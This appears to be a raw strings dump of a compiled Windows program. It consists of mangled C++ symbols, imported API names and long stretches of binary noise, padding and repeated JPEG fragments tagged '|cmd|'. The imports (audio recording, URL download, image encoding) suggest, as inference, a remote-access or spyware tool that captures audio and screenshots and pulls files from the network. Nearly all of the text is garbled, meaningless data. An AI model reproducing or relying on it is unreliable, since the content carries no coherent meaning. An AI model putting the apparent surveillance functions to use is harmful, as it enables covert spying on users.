?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z MSVCP60.dll StrToIntA PathFileExistsW PathFileExistsA SHLWAPI.dll waveInStart waveInOpen waveInAddBuffer waveInPrepareHeader waveInUnprepareHeader waveInClose waveInStop PlaySoundW mciSendStringA mciSendStringW WINMM.dll WS2_32.dll URLDownloadToFileW URLOpenBlockingStreamW urlmon.dll GdipGetImageEncodersSize GdipGetImageEncoders GdiplusStartup GdipLoadImageFromStream GdipLoadImageFromStreamICM GdipFree GdipDisposeImage GdipCloneImage GdipAlloc GdipSaveImageToStream GdipSaveImageToFile gdiplus.dll InternetCloseHandle InternetReadFile InternetOpenUrlA InternetOpenA WININET.dll GetStartupInfoA _itoa .?AVexception@@ .?AVlogic_error@std@@ .?AVout_of_range@std@@ .?AVtype_info@@ C7vP Hepw WXZ] VVTR_ RTVV\ wxxxxxxxxyuvvzzututtsrq^ "I4, 69D8H;6 &:;BMM- L?H0HAH FOO?M`' ,EEPQ 'KLKBNa !>.# *C@:< (J>2<3< #@5 khijjjjjjjjjjjjjjjjjjjjjhl mnggggggggggggggggggggggnm 47]E hh@. Fi% bTn!E N{P? EQdD pz,3Y hC;P PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD 0 0,020H0O0V0b0h0z0 1#1*101C1H1O1T1Z1`1s1y1 2%2=2Y2b2m2v2|2 3 3)3.393@3F3L3V3k3z3 3&4:4F4c4r4 5%5,585?5H5O5V5]5d5m5z5 6#6)6/656R6j6t6z6 7(797?7D7J7O7T7Y7`7e7j7o7x7~7 819V9{9 :":5:E:Z:a:r:|: ;0;=;O;g;l;r;{; <'<0=R=Y=h=y= >$>.>4>>>D>Q>Y>_>e> >G?P?Y?b?k? 1M1Z1g1 1"2/242:2I2S2]2l2u2 3"3+3?3U3_3p3{3 3<4I4U4`4m4 5*5D5g5 6<6O6U6 7%7]7c7q7w7 8'8.8:8C8g8r8~8 9*969E9c9l9u9|9 :7:D:R:\:y: ;0;9;V;];d;p;v; < <&<0<5<=->D>Y>`>q>w> ?'?1?>?F?N?Z?c?o?u?z? 1#1-161@1K1Q1V1\1{1 20252?2j2o2t2 3-343T3k3s3 4!4<4C4Q4Z4 4%5,525G5L5U5m5 6&6/6<6L6V6_6q6|6 7$7-747J7S7\7 8%8+8<8E8o8 :!:-:9:E:N:W:c:o:{: ;";+;4;A;R;n; ;c;>L>`>w> ?;?N?Z? 0%010\0m0u0 1H1\1p1|1 2D2K2n2 3F3U3e3 4%4S4]4i4r4y4 50565J5O5`5k5x5 5&636?6I6l6 7)7>7Y7`7o7 8-8]8i8x8 9#9J9T9`9 :D:M:T:e:n:w: ;';<;C;O;i; <*<>7>K>_>s> ?+?h?|? 0'080I0Z0`0p0 1>1R1l1s1 2$282p2 3#424F4Z4n4 415E5Y5m5~5 536G6[6o6 7%767<7L7P7T7X7\7`7d7h7l7p7t7x7 8"8&8*8.82868:8>8B8k8q8 909W9t9 :/:A:G:u: ;1;<;D;Q;V;l;w; <%<,<92L2R2e2 3-363?3J3r3{3 4#404<4B4H4N4f4o4x4 465r5 6(6.6?6H6Q6o6z6 7*7<7E7W7]7o7t7z7 7l8r8 9$9)929R9q9y9 :#:6:C:Y:q: ;,;3;:;];f; <#<*<1<=,>4>=>C>J>V>q>z> ?2?o?x? 0 0,020=0C0I0T0j0v0|0 1$1-161@1I1R1X1a1 2&2/282T2\2g2u2}2 3#3)3.3>3F3L3R3w3 4.444:4E4[4g4m4v4 5 5-565?5H5S5\5k5t5 6"6-6;6C6I6V6\6h6n6 7&7.777I7O7W7u7}7 8-8;8L8U8u8~8 9?9H9Q9Y9_9h9v9 :&:,:3:?:H:Q:Z:t:|: ;0;9;j;s;|; <(<5$>0>>>Y>b>k>t> ?$?-?8?>?U?]?z? 0*0@0J0R0Z0_0e0k0{0 1%131@1N1[1i1v1 2"292P2s2 3$3-333e3n3s3x3~3 4 494@4Q4X4^4f4 5$5-5R5d5x5 6+656<6S6X6n6s6 7 7/7=7O7c7j7s7{7 8(818H8N8Y8k8q8 999?9E9N9_9 :%:,:1:;:@:E:O:T:Z:d:j:t:y:~: :#;?;E;N;X;b;v; ;"<+&>9>I>O>X>m>~> ?.?6V6[6a6i6 7,747:7a7i7p7 8-868?8H8M8V8[8d8n8 949?9F9L9l9u9 :%:+:1:9:X:m:w: ;#;*;2;<;V;m; <$<:?>U>k> ?+?F?X?s? 0#0,050L0 1'10161H1d1w1 3(313:3C3L3X3d3p3y3 3+4I4T4 5&5/5E5N5k5x5 6Y6h6r6 7'7:7E7T7c7z7 8*8x8 9!9=9Q9o9v9}9 :+:1:B:M:Y:q: ;1;8;A;J; <$<:0>7>_> ?B?I?S?]?b?h?o?t? 0)040G0M0T0d0m0v0|0 0*1J1j1y1 2)202M2h2~2 363=3`3{3 4 4'4/4;4[4x4 6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6 6&7=7K7k7 8.8C8X8^8d8o8 9$989W9 ;!;';-;B;I;T;[;z; ;^>i>u> ?&?/?1U1Z1`1g1 1 242P2 3+31363B3H3W3]3b3n3t3 4 4&4<4C4J4V4\4r4x4 5.5?5R5c5 6g6w6 6(757D7Q7]7j7y7 7)8G8 9-939J9T9[9t9 :&:/:<:G:V:h:w: ;$;5;r; =$=Q=^=k= >,>B>W>a>g>n>s>|> ?"?+?@?J?b?r? 0)0F0R0p0 1 1/1O1w1 2'232C2a2h2 3j4p4 5)5d5l5 6,686 7#7+7D7K7_7s7y7 8'818=8X8_8m8v8 9$9P9{9 ;JG>X>i> ?5?F?`?i?u? 0&070E0[0o0 1-191E1Q1X1b1}1 2'2/2<2K2T2e2 3 3(353D3M3^3z3 414:4K4|4 5)5/595N5T5^5i5v5 6"6.63696M6S6]6j6s6 7$757?7E7T7 8'8F8L8Y8r8{8 9%91989>9F9V9\9f9v9}9 :7:=:H:N:X:^:d:j:x: ;";+;c;j;v; <(<@ >,>8>D>P>Y>b>k>t>}> ?"?'?,?K?`?f?k?p? 0#0(0I0N0g0 1$1>1D1N1T1_1v1 2(2/2A2K2T2j2 2F5k5 6)636=6G6N6T6Y6_6d6k6u6{6 7S7~7 80868=8J8O8X8]8c8 9 9&9,999@9E9j9r9x9 ;);;;@;E;R; <"<(<.<4<:<@?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ ++++++--+-+ ++-- -+----++++++++ GpSs tFTOd8fen= ==() !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ ^%So_zY AAAA EEIIIID OOOO xOUUU jc(= `+ B ?h}U mZgd %$BVdH W/`|d l4j.EL jc(= sf"d jc(= jc(= jc(= jc(= jc(= N6]j@ jc(= jc(= jc(= jc(= :10J :10J :10J :10J :10J :10J :10J :10J {m'4[ -4xX "ryxiw 9_2d 4E,M -Ie ~~LL bcqj$ FTzw ~bIc =O

g B3}? Xkz5 w&?) "Lr(e$ kSEm| e$R2 +x|l @O1$ 8$Oi! 1+a~ *;G$d AIKIH 4yR7h Ui#tY. !e#p `1tx 9k+u aIKEld% E-% aw$p9G KEBnP^- QP^] ('j.I ZJC6k :}2O C6:g 2s]: lB9a ^kKk x99' $]1#Y w#(' V[khaV E-%! ZJ@m QECu1 tOET 2.QU H8#8 t4QEy mlI_ N:~Ur vRV2e q[:]y KpC(YU0w #1'p *)Gg"5 Kyeo} x{8vF_ x{8vF_ aIKI[ E-% -mxk 5sV~Nm| m&i JVv7 1G)\;_ })*i u;eB JJZ( !IKI@ E-% :}2O @?OZ nS#q" SE,e C2rH 3gb( 7QX1l{ >V#:n< KSYnw$ z{V4 B$@B #/8P2 nQpT mQX7 lQX6 Ekd1 dbV, lQXs V5mx E-%! k^~# XJU2 "YVKa Uu ]# ZyF_ f);#H Jbv. d>tlQU JUTH 1-.8 djQY =(mZh MBA< ))i) J)i( F0r3 &&,C gy&] lBZ\m. 9cB& ME'6 JZJC IKE QEEq ucXV 7n?x6v *2-X kZARim 7tN] NQfuU pIGv E&8# ~ff< U-Ei 5FjF v<:# D2:L H$p9 7+iv'ufU L(cD'r #Eh]Nu g)Vg1 Mqypdx\egc /cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc $3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz #3R &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz h0jV Wz|9bF>o qtWi iQ`3] 2RWFM4 8c2J WKB_ /QEG- }+#RJ) #9Uu, 2E-Ie ~~LL bcqj$ FTzw ~bIc =O

g B3}? Xkz5 w&?) "Lr(e$ kSEm| e$R2 +x|l @O1$ 8$Oi! 1+a~ *;G$d AIKIH 4yR7h Ui#tY. !e#p `1tx 9k+u aIKEld% E-% aw$p9G KEBnP^- QP^] ('j.I ZJC6k :}2O C6:g 2s]: lB9a ^kKk x99' $]1#Y w#(' V[khaV E-%! ZJ@m QECu1 tOET 2.QU H8#8 t4QEy mlI_ N:~Ur vRV2e q[:]y KpC(YU0w #1'p *)Gg"5 Kyeo} x{8vF_ x{8vF_ aIKI[ E-% -mxk 5sV~Nm| m&i JVv7 1G)\;_ })*i u;eB JJZ( !IKI@ E-% :}2O @?OZ nS#q" SE,e C2rH 3gb( 7QX1l{ >V#:n< KSYnw$ z{V4 B$@B #/8P2 nQpT mQX7 lQX6 Ekd1 dbV, lQXs V5mx E-%! k^~# XJU2 "YVKa Uu ]# ZyF_ f);#H Jbv. d>tlQU JUTH 1-.8 djQY =(mZh MBA< ))i) J)i( F0r3 &&,C gy&] lBZ\m. 9cB& ME'6 JZJC IKE QEEq ucXV 7n?x6v *2-X kZARim 7tN] NQfuU pIGv E&8# ~ff< U-Ei 5FjF v<:# D2:L H$p9 7+iv'ufU L(cD'r #Eh]Nu g)Vg1 ^ art] 48392|cmd| JFIF (:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc /cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc $3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz #3R &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz h0jV Wz|9bF>o qtWi iQ`3] 2RWFM4 8c2J WKB_ /QEG- }+#RJ) #9Uu, 2E-Ie ~~LL bcqj$ FTzw ~bIc =O

g B3}? Xkz5 w&?) "Lr(e$ kSEm| e$R2 +x|l @O1$ 8$Oi! 1+a~ *;G$d AIKIH 4yR7h Ui#tY. !e#p `1tx 9k+u aIKEld% E-% aw$p9G KEBnP^- QP^] ('j.I ZJC6k :}2O C6:g 2s]: lB9a ^kKk x99' $]1#Y w#(' V[khaV E-%! ZJ@m QECu1 tOET 2.QU H8#8 t4QEy mlI_ N:~Ur vRV2e q[:]y KpC(YU0w #1'p *)Gg"5 Kyeo} x{8vF_ x{8vF_ aIKI[ E-% -mxk 5sV~Nm| m&i JVv7 1G)\;_ })*i u;eB JJZ( !IKI@ E-% :}2O @?OZ nS#q" SE,e C2rH 3gb( 7QX1l{ >V#:n< KSYnw$ z{V4 B$@B #/8P2 nQpT mQX7 lQX6 Ekd1 dbV, lQXs V5mx E-%! k^~# XJU2 "YVKa Uu ]# ZyF_ f);#H Jbv. d>tlQU JUTH 1-.8 djQY =(mZh MBA< ))i) J)i( F0r3 &&,C gy&] lBZ\m. 9cB& ME'6 JZJC IKE QEEq ucXV 7n?x6v *2-X kZARim 7tN] NQfuU pIGv E&8# ~ff< U-Ei 5FjF v<:# D2:L H$p9 7+iv'ufU L(cD'r #Eh]Nu g)Vg1 xz]? s1aS fGTn |qp_ /^2P QKdJ DsVs_ ]BI& =JaG7 Qm746i ssF+ T^;'c cPLT9P[J] 6Gn^ f&Nw N\-w X*:X npm* }gJw: )$pY g-yX| " C& actt Gk)t ?sh\i _q(C !T #d:$ q/ 8 5ChT| ACtd ^0=( k^S3 N,- v?@=Y#G WS~4 ihz, o3M~@ c26*p rR+[ \D.5 0dtJa YrE9 gX7M Rl.W .bxusf ?!5v `CCV 'J:} dSm,s gz%} 6 (; y="r nL06D. ,Xxw`T uGkLGf 6I#{` fzG` lHI7i*x FX8o WcHE PKX k /2>} 0CER\ v3.4 t'gF swP1; YjN! =vf6 D37l* iJ"|wYLv NVCj oI{> D3E= Z[/is %d#J T%pE 4eq4v x]N2z pA"icjj} pfNa G6%} [+z{= 6kI8< B61|A, X7x_< vb^bKw zM!k xE'm+ 5<#R a(~A- VD$NNKHo_@H GkXL) ~7!R "-`9 H4)K CMMC f`,w! `?G#W% g_-6 dh5 Pg{1 xg7l !DE3Hh gG&Q asC& )M1#f-u u)r )Or 9>Ub5 0[d}rY( lv25d !;wK\ -O2Q ~qF!d j=NY ~JLA 3|xF Y6xq pjSi ;SAQ 9cot2 "yp/ zhVF Vz'i }q:r2=x lv!1 yR(N U"gC {]RV I03P ~Mzv Co1D.a i\`H j"&n? +d?=O[ bC#f ZC*2% ]K4wg i9f@- n;878 [jI3 atuK qCQd SX,09F :rbw IJ/\ @wH`,[g E0Tx Bo0BZo _DuV _b-Z Qod}D nF-O_ ?CiN^SIU PB_V 3Z/l Be@U bBS2, ALU;kdo -R Co r#. ,"^D7 3QRR =~-3l 4gdZ ^Ti_ Os!+ ;Zk_ [b5g~ N4W> n%X4 bk/R cJ^)N FAlS &P8G /4_R A,ry (V.1 Mjev }}EG C8wI kH7)| aQPBZ /:wWn ,SSg ZZlk]{v g~5D7 wfC} GX{X 4'`HM Tk1^ lwEK* \SU!#k v><. t cdHu >pqFo @]p0Oe _@,<=o +l^di h=rz yxr=e 4vi2 CAD" :$2> aDhr* lxiG h`)Y )FTiQ A%/E ] ;S };}vZ* z:ww YfqI K r, R,9v9> WT[/ ?_p6N ;gElN V+EW4y lG1o `o[2 >]Ih B 1:#E c^rf 45G ! !8Wu xQTO fNI J r+Ap1 A[UN (b&13s 3|!m c^aiiu [LXv ,{~2o; =R5rK|:n7& ]YIO 00. Y=Cw j`J| isi" ] ^4 8E,#H= ['Aj a`s1[ UZ)P .JgN gg|E r9DE U1{v `A8] .E65 0my5tY SDH1L Mk4t +*&c F(c/ vUcZ _zUfL })s% [O<(t- LH0OT 4]JN |.N# ld,| ?hj/U e`HZ LX;G IVH? s8mo@D @WoYA bltT^ "]TI @ n# ok[~ Q_h! "+g&c`+ IyE" 4?/< b=_E ] N]*m {hNwT X*h, UxL8 9]-: K1S;AX ioy_ 4-te} ]z-k ?D{X kzVBx n:a# ['1e] b2<>H 8%'q" Ct`G FBjR JQGS ?V#N R;=x _uWu {Ca(F 00pD AT%@ %}:q'cX A"ZI Dl.?" ]5zk Ky=+ Uqr/ `a"RK {Gr >pA=' ]0GQ 3M>s on7#1 #|lB *Fy` !4\Qwa q*H#% $uo: IOO O($d =)#6 +HFOD X!7h uvf"qSv 9J[n kc3> *":&d uvRd 7@.c :+-, NrR1 jb)\mF pF)* 7:!v z+8xI* 0aF{Inj!a /$:61; z)Z$ I>>1 8>> N eH?U sYWw art]M 48434|cmd| JFIF (:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc /cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc $3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz #3R &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz h0jV Wz|9bF>o qtWi iQ`3] 2RWFM4 8c2J WKB_ /QEG- }+#RJ) #9Uu, 2E-Ie ~~LL bcqj$ FTzw ~bIc =O

g B3}? Xkz5 w&?) "Lr(e$ kSEm| e$R2 +x|l @O1$ 8$Oi! 1+a~ *;G$d AIKIH 4yR7h Ui#tY. !e#p `1tx 9k+u aIKEld% E-% aw$p9G KEBnP^- QP^] ('j.I ZJC6k :}2O C6:g 2s]: lB9a ^kKk x99' $]1#Y w#(' V[khaV E-%! ZJ@m QECu1 tOET 2.QU H8#8 t4QEy mlI_ N:~Ur vRV2e q[:]y KpC(YU0w #1'p *)Gg"5 Kyeo} x{8vF_ x{8vF_ aIKI[ E-% QRPQE J)i+ gq5uc JZJC MuKF bq(&6 z{U5X _#K:% sY_g *j!S =n'R ;2bF 5f)Rx QEdPQE JJZ+s ))i( bQKI[ HgP+W |~a*X pp{ v6&A [k.Fp *}=(c iQXP A-Me ,HR@$ @o#X< L!T>a q$LD$ K51n JD'/ XFD&W {U{k O^:{P tTVv ~_N}( Q@ E ;Tu=O W[gd " bx 7gv:c I,qc r2:R ET7K> 5)UQ" IwrOl ]ZSo ji5 }E-~ >QVt J)i+ ))i( aIKE : [,Sm t0FIdh wF%S )V6+p< ,e>h M_s= $:cF E?i V-{8o ))i) QEn`%%- JJZJC; ({j} QEbh aIKIHgb* DhQY0 :zsSK O|/qO mgmy JZ+s JJZJ ))i) ))i( ByQZ;4 $99< Ki%t 9SV)6 Oavd1 ))i( IKE! SQG4 :}2O :}2O QIHaE QHbQE %WX\JU %HW*H qV`0 E9P}Ed u=M- 2+yo Xbv+ MIY7- u;Ai enc@7 _:A> 3+FX hwT] ttW9 ttW9 ttW7 wEep e Gua wgEEs_ ))i) ELTi isRy %M]/ T{{t4 O!}W fi3R} {_!}S OinQ 9;FW N?JQ U8k'o 13Fj{kkv .OSM '=I] lXj1^ g?I] {`v61 < 9^ EsE] -J2J KW-6 Z~d. RGP) VN@ ]XY9E WZ2c\ ijai 6vm" luLE trIZM 4i"4 %ZEV *#5& 4aGf (*G| QLAW f$Qa -!\m 6GL#+ .mcX 8Q!C GpEu U)s; *'V^ OjZ*T ~lp{` smXM BIB9 ,A*I }iXe T-y32 Jl>^ )TTs |cmd|62389040 m8*W p%b @ PD;H ^#uKi 'o8j Z:;\$.^i "vdB x/:xz]? s1aS fGTn |qp_ /^2P QKdJ DsVs_ ]BI& =JaG7 Qm746i ssF+ T^;'c cPLT9P[J] 6Gn^ f&Nw N\-w X*:X npm* }gJw: )$pY g-yX| " C& actt Gk)t ?sh\i _q(C !T #d:$ q/ 8 5ChT| ACtd ^0=( k^S3 N,- v?@=Y#G WS~4 ihz, o3M~@ c26*p rR+[ \D.5 0dtJa YrE9 gX7M Rl.W .bxusf ?!5v `CCV 'J:} dSm,s gz%} 6 (; y="r nL06D. ,Xxw`T uGkLGf 6I#{` fzG` lHI7i*x FX8o WcHE PKX k /2>} 0CER\ v3.4 t'gF swP1; YjN! =vf6 D37l* iJ"|wYLv NVCj oI{> D3E= Z[/is %d#J T%pE 4eq4v x]N2z pA"icjj} pfNa G6%} [+z{= 6kI8< B61|A, X7x_< vb^bKw zM!k xE'm+ 5<#R a(~A- VD$NNKHo_@H GkXL) ~7!R "-`9 H4)K CMMC f`,w! `?G#W% g_-6 dh5 Pg{1 xg7l !DE3Hh gG&Q asC& )M1#f-u u)r )Or 9>Ub5 0[d}rY( lv25d !;wK\ -O2Q ~qF!d j=NY ~JLA 3|xF Y6xq pjSi ;SAQ 9cot2 "yp/ zhVF Vz'i }q:r2=x lv!1 yR(N U"gC {]RV I03P ~Mzv Co1D.a i\`H { KQ P0fS(S[3L wm O ^AM=! \U8q/ qU%6( &JZk: ;QgE C-h" Xi$hF S4-HI aeG|r Xhs iy?3# *3H 0u?+CZ ~;Do! \RS8 }8.- :`Uz!K lp-$ WDHc \I$ /D^.q4 Qk>, de8a l<_: An&: ;'@8 N73SH Zld> )z'u'% nL@i' % |Rn ,#RAuz C@M= )Q<(Eor6 .NFdC:j a,3^ O1s9i ]%TI 4xbC .Y3I M'6k +<#d ycR/Wq !Nkc VtJ`eh H1Wm RE^]z hb;K ,T),a hsKy=^_ 'Gd ~ K:lx QP+I BK,_: 2PmZx xQhE0J 5((i 5.(d (tpQ LxNE 8Uq:^ Zw"j9 !b$w V KK4D So4; 6Xmzx& 1Sd5 gENk j+:>] h'qO 1_{9] \\18 ]CmS9 ^hQid i_"@, 45dY \6dp6 @>W(a 'slu $hW w1 6~PPB+ dIXf |OQo ^p_zj @IRd />dx e,;$/ 3'}p ;LHs 8Djx~ $}>3 _D`wPP -;m}! ];Q qwO$ ivz v 2i R1\] (xF1[XK w*CB kAg)b 0ezt ;!p| OJK[ HO50q Kjef|W ;_y= IEqql -EUt1 #%g# G/g8 `DqJ UBb7` D,2# X-2$ }Q~Bo 7 un j St 5x7p cx m Vb5_ *a9= e:W_ q %M~$ UyoU Ucw3 Y}mp 8:u! f.O XrV q. wg WYb%6 b?9A DcB[ $>XS qs02# N01- gWm* _\2$l T/=A RRPy W-f=h 7p{4 LZ'o sGsu(E Oc#[Y|4 O0v.+ \ ,: hoOe efG\ #H;[A/; #eFM*v{ E|8 ,\ ky"mof /6-v5" 9uAPwY Fw@X $~Pe ~sX` Y>%e |Nf>o2 0;R; bs* V~ GLA zaop +_U] xs1Z 7CHW2F m(DR y|W6 J[-q ySXH@O c^KDsa OV 88 +U7~J DW 4.KsD 'I1bd 3s27 (B/$i` *%W qe }%?Z *JO" : nB "$xYa .)^0 >,Uo ?*aS `=p\ 2o/' G#^g mDmB @/N] ZH?U sYWw vS > vQA> wbPY '.Kw wbPY wBPY wbPY '.Kw w\)' w:VY w:VY qwgV $v\S 0 @ P ` 0 @ P ` 0 @ P ` 0 @ P ` 0 @ P ` 0 @ P ` ######$#########$###### ######$%&&&&&&%&&&&&&&&&%&&&&&& &&&&&&%&0 '('('('('('('('('($%'('(%'('('('('('('('(($%'('('($%'('('('('('('('('('(''('('(%($$%$%$$%$$$%%$$$$%$$%$'$%(($$%''($%$%$$%$%($%''($$$%$%$$%%)$%%%))))'*($+%$+%'('('('('('('('(%'(($+%'($$$%'('('(P '('('('($%$%$%$%$%$%$%$%$%$%$%$%$%$%%%%%%%$$%$$%%$%$$$$%$%$%$%$%%%%%%%%%%%%%%%%%%%%%%%%%(%%(%%%%%%%%)%%%%%%%%%%%,,,,,,,,,--.,.....-----/--//---/..------//////--,,,,.---------.-----------------P 0000000000000000000000000000000100000000111110000001111111111111$%$%--$% ,%%%" //'2''' ''($$$$$$$$$$$$$$$$$ $$$$$$$''(((((%%%%%%%%%%%%%%%%%%%%%%%%%((((($%%$''%%%$%$%$%$%%%%%$%3$%$$%%$$$ $'$'$$$'$$$$'$'$$$$$$$$$$'$$$$$$$$$$$$$$$$$$$$$$%%%%%%%%%(%%%%%%%(%(%%%(%%%%(%(%$%$%$%'($%$%$%$%$%40000011$%$%$%$%'($%$%'($%$%$%$%$%$%$%$%'($%$%'($%$%$%$%$%$%'($'($%$%$%$%$%$%%'('($%'($%'('('($%'('('($%'($%'('('('($%'($%$%$% $%$% $$$$$$$$$$$$$$$$$$$$$$ ,566666 %%%%%%%%%%%%%%%%%%%%%%% 0000000000000000010000000000000000000000000007070070171 888888888888888888888888888 88877 9999 33:;;:<733111111111117 888888888888888=8888888888000000001111001>>>11 ??????????;@@7880888888888888888888878111111191001111AA113000188BBBBBBBBBB888::8 77777777777777 818888888888888800000000000 888888888000000000008 CCCCCCCCCC88888888888888888000000000AA3"""8 11D)))))))))))))))))))))))))))))))))))))) 0)EEE>>>>>>>>EEEE0 )0000 ))))))))))>>66FFFFFFFFFF6.) ))))) )))))))) )))))))))))))))))))))) ))))))) )))) 0)EEE>>>> EE0) )))>> FFFFFFFFFF))GGDDDDDD4 0 @ @ P ` p )))))) EEE>> )))) FFFFFFFFFF11)))1 ))))))))I )))))))))))))) ))))) 0)EEE>>>>> ))))) 0)E>E>>>> )))))) )))) )))))))))))) EE>EE EEE0 DDD333333G3 )))))))) )))))))))))))))))) ))))) )>>>EEEE >>>0 JJJJJJJ4 )))))))) )))))) ))))) 0)EEEEEEE EE>0 )))))))))) )EEE>>>> EEE0 DDDDDD 4)))))) )))))))))))))))))) )))))))) ))))))))) ))))))) EEE>>> EEEEEEEE )))))))))))))))))))I)I))))))))KILIILLLLLLM GIIIIIIKMMMMMMMM6FFFFFFFFFF66 )))) ))))))) )))I>II>>>>>> IIIII 000001 FFFFFFFFFF )4446666666666666664444400444444FFFFFFFFFFDDDDDDDDDD404040""""NN)))))))) )))))))))))))))))))) >>>>>>>>>>>>>1D>>000600)))) 11111111 111111111111111111111111111111111111 444444440444444 4466666 )))))))))))EE>>>>E>>>>10D00DD11)FFFFFFFFFF666666))))))EE>>))))111)EDD))EEDDDDD)))>>>>)))))))))))))1EE>>NNNNNN0)NFFFFFFFFFF 44$$$$$$ )))))))))))6) @ @ @ @ @ )))))))))) )))) )))))))))))))))))) @ @ @ @ @ @ @ @ @ @ @ @ @ ))))))))) )))) ))))))) )))) )))) ))))))) )))) ))))))))))))))) ))))))))@ @ @ @ P @ @ P @ @ p @ @ ))))))))))) 1466666666DDDDDDDDDDDDDDDDDDDD 3333333333 ))))) @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ )))))))))))))66)))))))) O))))))))))))))))))))))))))"" )))))))))))666))@ @ @ @ @ @ p @ @ @ @ ))))))))))))) ))))>>1 ))>>166 ))>> )))IIIIIIIIIIIIIIIIIPPE>>>>>>>EEEEEEEE1DD00000000000666)666G)0 FFFFFFFFFF JJJJJJJJJJ @ @ 0 """""""""""111Q )))I)))))))))))))))))))) )))))))))1) @ @ @ @ @ @ I)))))))))))))))>>>EEEE>>111 DD1DDDDDD000 ""FFFFFFFFFF)))))))))))))) EEEEEEEEEEEEEEEEE)))))))DD FFFFFFFFFF ""3333333333333333 @ @ )))))))>>EEE 66@ 1111D)))))))))))))))0E>>>>>E>EEEEE>EN))))))) 64444444444000000000444444444 11D))))))))))))))D11>>EE>>N @ @ ))))DDEEEEEE>1111111DD00 66666FFFFFFFFFF )))FFFFFFFFFF))))))))))))))......66@ @ %%%%%%%%%%%%......................(((((((((%%%%%%%%%%%%%)%%%%%%%%%%%%%%%%%%)))))11110000000000001111111 @ @ @ '('('(((((((%%$%'('('('('($%$%$%P ((((((((''''''''(((((( '''''' (((((((( '(((((((((((((( ((((((((********((((( ((''''*/R///((( ((''''*///(((( (('''' ///(((((((('''''/// ((''''*// OOOOOOOOOOO S9222222""TT""TT""""""""""OU V;;WWW"""2""""""""""2X"""""""""""""3""""""""""""O YYYYYYZ[\""RYYYYYYYYYYZ[\"" GGGGGGGGG]GGGGGGGGGGGG 33$3333$33%$$$%%$$$%3$333$$$$$333333$3$3$3$$$$G%$$$$%))))%33%%$$33333$%%%%3333%4 JJJJJJJJJJJJJ)))$%)))) @ @ 33[G3\\333333333 333333333""33333333333444444444444444444444444444444444444433333333334333333333333333333 3333333 33333333333 JJJJJJJJJJJJJJJJJJJJJJJJYYYYYYYYYYYYYYYYYYYY44444444444444JJJJJJ \333\\33\\333333333333333333\\330 33333333333333 33333333333343333333333333333 3333 3333 3333 333333333333 3333333333333333333 3333 3333333 3333333""""""""""""""JJJJJJJJJJJJJJ3 33333333 33333333333333 33333""3333 333333"""""""""" 333""""""""""""""""""""""333333333333333""""3333333333333333""33 33333 $$$$$$$$$$$$$$$ %%%%%%%%%%%%%%% $%$$$%%$%$%$%$$$ %$%%$%%%%%%%) $%$%%333333 """"J"" %%%%%% )))))) )))))))) ))))))) @ @ @ 